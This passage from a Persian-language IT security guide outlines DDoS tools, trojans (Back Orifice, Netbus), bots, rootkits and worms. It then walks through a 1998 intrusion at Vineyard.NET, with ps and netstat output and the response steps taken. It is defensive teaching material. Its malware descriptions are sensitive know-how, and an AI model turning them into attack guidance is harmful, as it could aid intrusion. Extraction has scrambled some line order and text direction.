‫ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺭﺍ ﻋﻠﻴﻪ ﻳﻚ ﺷﺨﺺ ﺛﺎﻟﺚ ﺷﺮﻭﻉ ﻣﻲﻛﻨﺪ‪ .‬ﻧﺴﺨﻪﻫﺎﻱ ‪ Trinoo‬ﺑﺮﺍﻱ ﺍﻏﻠـﺐ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ ‪ Unix‬ﺍﺯ ﺟﻤﻠـﻪ‬
‫ﻻ ﺑﺼﻮﺭﺕ ﻣﺨﻔﻴﺎﻧﻪ ﻣﻲﺑﺎﺷﺪ‪ .‬ﻳﻚ ﺗﺤﻠﻴﻞ ﻣـﺸﺮﻭﺡ ﺍﺯ ‪ Trinoo‬ﺩﺭ‬
‫‪ Solaris‬ﻭ ‪ Red Hat Linux‬ﻣﻮﺟﻮﺩ ﺍﺳﺖ‪ .‬ﻭﺟﻮﺩ ‪ Trinoo‬ﻣﻌﻤﻮ ﹰ‬
‫ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪:‬‬
‫‪http://staff.washington.edu/dittrich/misc/trinoo.analysis‬‬
‫‪ Back Orifice‬ﻭ ‪Netbus‬‬
‫ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ windows‬ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ ﺑﺮ ﺿﺮﺑﻪﻫﺎﻱ ﺻﻔﺤﻪ ﻛﻠﻴﺪ ﻧﻈـﺎﺭﺕ ﻛﻨﻨـﺪ‪،‬‬
‫ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ‪ upload‬ﻭ ‪ download‬ﻛﻨﻨﺪ‪ ،‬ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺭﺍ ﺭﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺤﺖ ﻓﺮﻣـﺎﻥ ﺑـﻪ ﺍﺟـﺮﺍ‬
‫ﺩﺭﺁﻭﺭﻧﺪ‪.‬‬
‫‪Bot‬ﻫﺎ‬
‫ﻻ ﺑﻮﺳﻴﻠﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺭﻭﻱ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﭘﺨـﺶﺷـﺪﻩ ﺩﺭ ﺷـﺒﻜﻪ‬
‫‪Bot‬ﻫﺎ )ﻣﺨﻔﻒ ‪robot‬ﻫﺎ( ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻮﭼﻜﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪Bot .‬ﻫﺎ ﻳﻜﻲ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻘﺪﻣﺎﺗﻲ ﺑﺮﺍﻱ ﻣﻬﺎﺭ ﻭ ﻫﺪﺍﻳﺖ ﺣﻤﻼﺕ ﺗﻮﺯﻳﻊﺷـﺪﺓ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﺭﻭﻱ ﻛﺎﻧﺎﻟﻬـﺎﻱ‬
‫ﺗﻘﻮﻳﺖ ﮔﻔﺘﮕﻮﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻲﺑﺎﺷﻨﺪ‪Bot .‬ﻫﺎ ﻣﻤﮑﻦ ﺍﺳﺖ ﺑﻮﺳﻴﻠﺔ ﻭﻳﺮﻭﺳﻬﺎ ﻭ ﻳﺎ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺗﻮﺯﻳﻊ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻤﮑﻦ ﺍﺳﺖ ﺗـﺎ‬
‫ﺭﻭﺯﻫﺎ‪ ،‬ﻫﻔﺘﻪﻫﺎ‪ ،‬ﻭ ﻳﺎ ﻣﺎﻫﻬﺎ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺑﮑﺎﺭ ﺑﻴﺎﻓﺘﻨﺪ‪ .‬ﺍﺯ ‪bot‬ﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﮐﺎﺭﻫﺎﻱ ﺧﻮﺩﮐﺎﺭ ﻧﻴﺰ ﺑﻬﺮﻩ ﺑﺮﺩ‪.‬‬
‫‪Rootkit‬ﻫﺎ‬
‫‪ rootkit‬ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺳﺖ ﻛﻪ ﻫﻤﺰﻣﺎﻥ ﺑﻪ ﻣﻬﺎﺟﻢ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻛﺎﺭﺑﺮ ﺳﻄﺢ ﺑﺎﻻ ﺭﺍ ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧـﻪ ﻣـﻲﺩﻫـﺪ‪،‬‬
‫ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﺭﺍ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻛﺎﺭ ﻣﻲﮔﺬﺍﺭﺩ‪ ،‬ﻭ ﻫﺮ ﺭﺩﭘﺎﻳﻲ ﺍﺯ ﺣﻀﻮﺭ ﻣﻬﺎﺟﻢ ﺭﺍ ﭘﺎﻙ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﺍﺑﺘﺪﺍ ‪rootkit‬ﻫﺎ ﺑﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪Unix‬‬
‫ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ )ﻭ ﻧﺎﻡ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ‪ root‬ﻧﻴﺰ ﺍﺯ ﻫﻤﻴﻨﺠﺎ ﺁﻣـﺪﻩ(‪ ،‬ﻭﻟﻲ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ windows‬ﻫﻢ ﺗﻮﻟﻴـﺪ ﺷـﺪﻩﺍﻧـﺪ‪ .‬ﻳـﻚ ‪rootkit‬‬
‫ﻧﻮﻋﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻛﺎﺭﺑﺮ ﺳﻄﺢ ﺑﺎﻻ ﺗﻼﺷﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ .‬ﻫﻤﻴﻨﻜﻪ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮ ﺳـﻄﺢ ﺑـﺎﻻ‬
‫ﺑﺪﺳﺖ ﺁﻣﺪ‪ rootkit ،‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻐﻴﻴﺮ ﺩﻫﺪ ﻛﻪ ﻳﻚ ﺩﺭﺏ ﻣﺨﻔﻲ ﺑﻪ ﺁﻥ ﺍﺿﺎﻓﻪ ﺷﻮﺩ‪ .‬ﺁﻧﮕﺎﻩ ﻫﺴﺘﺔ ﺍﺻﻠﻲ‬
‫ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ ﻛﻪ ﻫﺮ ﺗﻼﺵ ﺑﺮﺍﻱ ﺧﻮﺍﻧﺪﻥ ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ‪ ،‬ﺑﺠﺎﻱ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﻣﻘﺪﺍﺭ ﺗﻐﻴﻴﺮﻳﺎﻓﺘﻪ ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ؛ ﻓﺮﺍﻣﻴﻦ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﻧﺪ ﻛﻪ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻣﻬﺎﺟﻢ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻧﻴﺎﻳﻨﺪ؛ ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ ‪ rootkit‬ﻣﻤﻜﻦ ﺍﺳﺖ ﭘﻨﺞ‬
‫ﺩﻗﻴﻘﻪ ﺍﻧﺘﻬﺎﻳﻲ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﺍﺯ ﺣﺎﻓﻈﺔ ﺭﺍﻳﺎﻧﻪ ﺣﺬﻑ ﻛﻨﺪ‪.‬‬
‫ﻛﺮﻣﻬﺎ‬
‫‪٤٣‬‬
‫ﻛﺮﻣﻬﺎ ﻛﻪ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ ﻳﺎ ﺍﺟﺰﺍﻱ ﺷﺒﻜﻪﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺗﺒﺪﻳﻞ ﺑﻪ ﺭﻭﺵ ﺭﺍﻳﺠﻲ‬
‫ﺑﺮﺍﻱ ﺧﺪﺷﻪ ﺩﺍﺭ ﻛﺮﺩﻥ ﺁﻧﻲ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﻣﻄﺎﻟﻌﻪ ﻣﻮﺭﺩﻱ‪Faxsurvey :‬‬
‫ﺩﺭ ﻫﻔﺘﻢ ﺍﻛﺘﺒﺮ ‪ ،۱۹۹۸‬ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﺩﺭ ‪ Vineyard.NET‬ﻣﺘﻮﺟﻪ ﺷﺪ ﻛﻪ ﻛﺎﺭﺑﺮ ‪ http‬ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ﻭﺏ ﺷـﺮﻛﺖ ﻭﺍﺭﺩ ﺷـﺪﻩ‬
‫ﺍﺳﺖ‪:‬‬
‫‪Script started on Wed Oct 7 20:54:21 1998‬‬
‫‪Bash-2.02# W‬‬
‫‪8:57PM up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35‬‬
‫‪USER TTY FROM‬‬
‫‪LOGIN@ IDLE WHAT‬‬
‫‪Worms‬‬
‫‪43‬‬
‫‪٢٧١‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪http p0 KRLDB110-06.spli Tue02AM 1days /bin/sh‬‬
‫)‪simsong p1 asy12.vineyard.n 8:42PM 15 -tcsh (tcsh‬‬
‫‪ericx p2 mac-ewb.vineyard 8:46PM 0 script‬‬
‫‪ericx p3 mac-ewb.vineyard 8:46PM 11 top‬‬
‫‪ericx p4 mac-ewb.vineyard 8:53PM 1 sleep 5‬‬
‫‪bash-2.02#‬‬
‫ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪ ﺑﺎ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ BSDI‬ﻧﮕﺎﺭﺵ ‪ ۳,۱‬ﺑﺎ ﻫﻤﺔ ﻭﺻﻠﻪﻫﺎ‪ ٤٤‬ﻭ ﺍﺻﻼﺣﺎﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﻩ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺑﻮﺩ ﻛﺎﺭ ﻣﻲﻛﺮﺩ‪ .‬ﺳﺮﻭﻳﺲ‪-‬‬
‫ﺩﻫﻨﺪﺓ ﻭﺏ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Apache‬ﻣﻮﺳﻮﻡ ﺑﻪ "‪ "Strong-hold‬ﺑﻮﺩ‪ .‬ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ ﺷـﺮﻭﻉ ﻋﻤﻠﻴـﺎﺕ ﺧﻮﺩﻛـﺎﺭ ﻧﻘـﻞ ﻭ‬
‫ﺍﻧﺘﻘﺎﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭﺟﻮﻩ ﻛﺎﺭﻫﺎﻱ ﺧﺎﻧﮕﻲ ﺩﺭ ﺣﺴﺎﺑﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪ‪ .‬ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﻧﻘـﻞ ﻭ ﺍﻧﺘﻘـﺎﻻﺕ ﺍﻳـﻦ ﻭﺟـﻮﻩ‪ ،‬ﺭﺍﻳﺎﻧـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﻭ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﺮﺩ‪) .‬ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﻗﺎﻟﺐ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﺷﺪ‪(.‬‬
‫ﺩﺭ ﻫﻤﺔ ﻣﻮﺍﺭﺩ ﻣﺸﺎﺑﻪ‪ ،‬ﻭﺭﻭﺩ ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﻌﻨﻮﺍﻥ ‪ http‬ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﻴﺠﻪ ﺩﻭ ﭼﻴﺰ ﺑﺎﺷﺪ‪ .‬ﺍﻭﻝ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﻀﻮ ﭘﺮﺳﻨﻞ ‪ ISP‬ﺑﺎﺷﺪ‬
‫ﻛﻪ ﺍﺯ ﺣﺴﺎﺏ ‪ http‬ﺑﺮﺍﻱ ﺭﻓﻊ ﺍﺷﻜﺎﻝ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻩ‪ ،‬ﻭ ﺩﺭ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻤﻲ ﺑﺎﺷﺪ ﻛﻪ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑـﻪ ﺣـﺴﺎﺏ‬
‫‪ http‬ﭘﻴﺪﺍ ﻛﺮﺩﻩ ﺍﻣﺎ ﻣﻮﻓﻖ ﻧﺸﺪﻩ ﺩﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪ .‬ﭼﻮﻥ ﻛﺎﺭﺑﺮ ‪ http‬ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﻧـﺎﻣﺶ ﺑـﺎ ‪KRLD110-06.spli‬‬
‫ﺷﺮﻭﻉ ﻣﻲﺷﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪﻩ ﺑﻮﺩ‪ ،‬ﻛﺎﺭﻣﻨﺪ ﺍﻳﻦ ﻣﺆﺳﺴﻪ ﻓﻬﻤﻴﺪ ﻛﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻳﻚ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮ ﻣﺠﺎﺯ ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻭﻗﺘﻲ ﻧﻔﻮﺫ ﻛﺸﻒ ﺷﺪ‪ ،‬ﻳﻜﻲ ﺍﺯ ﭘﺮﺳﻨﻞ ﺑﻼﻓﺎﺻﻠﻪ ﺑﺮﻧﺎﻣﻪ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺨﺼﻮﺹ ‪ Unix‬ﺭﺍ ﺍﺟﺮﺍ ﻛﺮﺩ ﺗﺎ ﺍﻗﺪﺍﻣﺎﺕ ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﺛﺒـﺖ ﻛﻨـﺪ‪.‬‬
‫ﺑﻨﻈﺮ ﺭﺳﻴﺪ ﻛﻪ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺗﺎ ﻣﺪﺕ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﺭﻭﺯ ﺑﻪ ﺷﺒﻜﻪ ﻣﺘﺼﻞ ﻧﺸﺪ‪ .‬ﻧﻔﻮﺫ ﺍﻭﻟﻴﻪ ﺩﺭ ﺭﻭﺯ ﺳﻪﺷﻨﺒﻪ ﺳﺎﻋﺖ ‪ ۲‬ﺑﺎﻣﺪﺍﺩ ﺭﺥ‬
‫ﺩﺍﺩﻩ ﺑﻮﺩ‪ .‬ﮔﺎﻡ ﺑﻌﺪﻱ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻫﻤﺔ ﭘﺮﺩﺍﺯﻩﻫﺎﻳﻲ‪ ٤٥‬ﻛﻪ ﺩﺭ ﺁﻧﺰﻣﺎﻥ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺑﻮﺩﻧﺪ ﻓﻬﺮﺳﺖ ﺷﻮﻧﺪ‪ .‬ﺩﻭ ﭘﺮﺩﺍﺯﻩ ﻏﻴﺮﻋﺎﺩﻱ ﺑﻮﺩﻧﺪ‬
‫ ﺩﻭ ﻧﺴﺨﻪ ﺍﺯ ﭘﻮﺳﺘﻪ‪ /bin/sh ٤٦‬ﻛﻪ ﺗﻮﺳﻂ ‪ http‬ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻩ ﺑﻮﺩﻧﺪ‪ .‬ﻫﺮ ﺩﻭﻱ ﺍﻳﻦ ﭘﻮﺳﺘﻪﻫﺎ ﺍﺯ ﺭﻭﺯ ﮔﺬﺷـﺘﻪ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ ﻛـﺮﺩﻩ‬‫ﺑﻮﺩﻧﺪ؛ ﻳﻜﻲ ﺩﺭ ﺳﺎﻋﺖ ‪ ۲‬ﺑﺎﻣﺪﺍﺩ ﻭ ﺩﻳﮕﺮﻱ ‪ ۴‬ﺑﺎﻣﺪﺍﺩ‪.‬‬
‫ﺑﻨﻈﺮ ﻣﻲﺭﺳﻴﺪ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﻣﻮﻓﻖ ﺑﻪ ﻧﻔﻮﺫ ﺷﺪﻩ ﻭ ﺳﭙﺲ ﺑﻨﺎ ﺑﻪ ﺩﻻﻳﻠﻲ ﻛﺎﺭ ﺭﺍ ﺭﻫﺎ ﻛﺮﺩﻩ ﺍﺳﺖ‪ ISP .‬ﺑﺮﺍﻱ ﺭﻭﻳـﺎﺭﻭﻳﻲ ﺑـﺎ ﺍﻳـﻦ ﺗﻬﺪﻳـﺪ‬
‫ﺿﻮﺍﺑﻂ ﺯﻳﺮ ﺭﺍ ﺍﺑﻼﻍ ﻛﺮﺩ‪:‬‬
‫‪.۱‬‬
‫‪.۲‬‬
‫‪.۳‬‬
‫ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﺍﺯ ﺁﻧﭽﻪ ﺩﺭﺣﺎﻝ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻥ ﺍﺳﺖ ﺁﮔﺎﻩ ﻧﻜﻨﻴﺪ‪.‬‬
‫ﺁﺩﺭﺱ ‪ IP‬ﻣﺒﺪﺃ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴﺪ‪.‬‬
‫ﺍﺯ ﻓﺮﻣﺎﻥ ‪ kill‬ﺩﺭ ‪ Unix‬ﺑﺮﺍﻱ ﺗﻮﻗﻒ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﻣﺰﺍﺣﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﻓﺮﻣﺎﻥ ﻋﻠﻴﺮﻏﻢ ﺑﺎﻗﻲ ﮔﺬﺍﺷﺘﻦ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﭘـﺮﺩﺍﺯﻩﻫـﺎ‬
‫ﺩﺭ ﺣﺎﻓﻈﻪ‪ ،‬ﺍﺯ ﺍﺟﺮﺍﻱ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪Patches‬‬
‫‪Process‬‬
‫‪Shell‬‬
‫‪44‬‬
‫‪45‬‬
‫‪46‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫‪bash-2.02# ps auxww‬‬
‫‪USER PID %CPU %MEM VSZ RSS TT STATED TIME COMMAND‬‬
‫‪root‬‬
‫)‪11766 3.0 0.0 0 0 ?? Z 23Sep98 0:00.00 (admin-server‬‬
‫‪root‬‬
‫)‪3763 1.0 0.0 0 0 ?? Z 2:03PM 0:00.00 (junkbuster‬‬
‫‪mail‬‬
‫‪18120 1.3 0.3 816 724 ?? S 8:56PM 0:00.46 smap‬‬
‫‪root‬‬
‫)‪17573 1.0 0.0 0 0 ?? Z 11:03AM 0:00.00(admin-server‬‬
‫‪root‬‬
‫‪16 0.0 0.0 68 64 ?? Is 10Sep98 0:00.00 asyncd 2‬‬
‫‪root‬‬
‫‪18 0.0 0.0 68 64 ?? Is 10Sep98 0:00.02 asyncd 2‬‬
‫‪root‬‬
‫‪28 0.0 8.0 748 20680 ?? Ss 10Sep98 0:16.32 mfs -o rw -s 40960 /dev/sdob/tmp‬‬
‫)‪(mount_mfs‬‬
‫‪root‬‬
‫‪53 0.0 0.1 268 296 ?? Ss 10Sep98 0:38.23 gettyd –s‬‬
‫‪root‬‬
‫)‪18670 0.0 0.5 560 1276 ?? S Tue02AM 0:04.77 (xterm‬‬
‫‪http‬‬
‫‪18671 0.0 0.1 244 276 p0 Is Tue02AM 0:02.23 /bin/sh‬‬
‫‪http‬‬
‫‪26225 0.0 0.1 236 276 p0 I+ Tue04AM 0:00.7 /bin/sh‬‬
‫…‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
.‫ ﻳﻚ ﻧﺴﺨﺔ ﺛﺎﻧﻮﻳﻪ ﺍﺯ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‬Unix ‫ ﺩﺭ‬gcore ‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ‬
.‫ ﻧﻔﻮﺫﮔﺮ ﺗﻌﺮﻳﻒ ﻧﻤﺎﻳﻴﺪ‬ISP ‫ ﺑﺮﺍﻱ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﺑﺴﺘﻪﻫﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﻣﺒﺪﺃ‬ISP ‫ﻳﻚ ﺿﺎﺑﻄﻪ ﺩﺭ ﻣﺴﻴﺮﻳﺎﺏ‬
.‫ﻼ ﺍﺯ ﺑﻴﻦ ﺑﺒﺮﻳﺪ‬
‫ ﻛﺎﻣ ﹰ‬kill -9 ‫ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺭﺍ ﺑﺎ ﻓﺮﻣﺎﻥ‬
.‫ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻧﻔﻮﺫﮔﺮ ﭼﮕﻮﻧﻪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪﻩ ﻭ ﺣﻔﺮﺓ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺭﺍ ﺍﺻﻼﺡ ﻛﻨﻴﺪ‬
.‫ﻣﺠﺮﻳﺎﻥ ﻗﻀﺎﻳﻲ ﺭﺍ ﻣﻄﻠﻊ ﺳﺎﺯﻳﺪ‬
٢٧٢
.۴
.۵
.۶
.۷
.۸
‫ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﻃﻼﻋـﺎﺕ ﺟﺪﻳـﺪﻱ ﺑﺪﺳـﺖ‬.‫ ﺍﻳﻦ ﻛﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‬netstat ‫ ﺳﻌﻲ ﻛﺮﺩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ‬ISP ،‫ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﻧﻔﻮﺫﮔﺮ‬
‫( ﺑـﻪ‬Apache.Vineyard.NET) ‫ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ‬X11 ‫ ﺑﻠﻜﻪ ﻳﻚ ﺍﺗﺼﺎﻝ‬،‫ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻧﺸﺪﻩ ﺑﻮﺩ‬SSH ‫ ﻳﺎ‬telnet ‫ ﻧﻔﻮﺫﮔﺮ ﺑﺎ‬.‫ﺁﻣﺪ‬
.‫ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﻣﻬﺎﺟﻢ ﺍﺟﺮﺍ ﻣﻲﺷﺪ ﻭﺟﻮﺩ ﺩﺍﺷﺖ‬X ‫ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ‬
bash-2.02# netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp
0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1137 SYN_RCVD
tcp
0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1136 SYN_RCVD
tcp
0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1135 SYN_RCVD
tcp
0 0 VINEYARD.NET.http DSY27.VINEYARD.N.1079 SYN_RCVD
tcp
0 2456 VINEYARD.NET.http nhv-ct4-09.ix.ne.1134 ESTABLISHED
tcp
0 2268 VINEYARD.NET.http DSY27.VINEYARD.N.1078 ESTABLISHED
tcp
0 2522 VINEYARD.NET.http 209.174.140.26.1205 ESTABLISHED
tcp
0 8192 VINEYARD.NET.http host-209-214-118.1785 ESTABLISHED
tcp
0 4916 VINEYARD.NET.http host-209-214-118.1784 ESTABLISHED
tcp
0 0 VINEYARD.NET.http host-209-214-118.1783 ESTABLISHED
tcp
0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1163 FIN_WAIT_2
tcp
0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1135 ESTABLISHED
tcp
0 0 LOCALHOST.VINEYA.1135 LOCALHOST.VINEYA.sendm ESTABLISHED
tcp
0 0 VINEYARD.NET.smtp 208.135.218.34.1479 ESTABLISHED
tcp
0 3157 VINEYARD.NET.pop ASY5.VINEYARD.NE.1027 ESTABLISHED
tcp
0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2050 ESTABLISHED
tcp
0 0 VINEYARD.NET.http host-209-214-118.1782 FIN_WAIT_2
tcp
0 0 VINEYARD.NET.http host-209-214-118.1781 FIN_WAIT_2
tcp
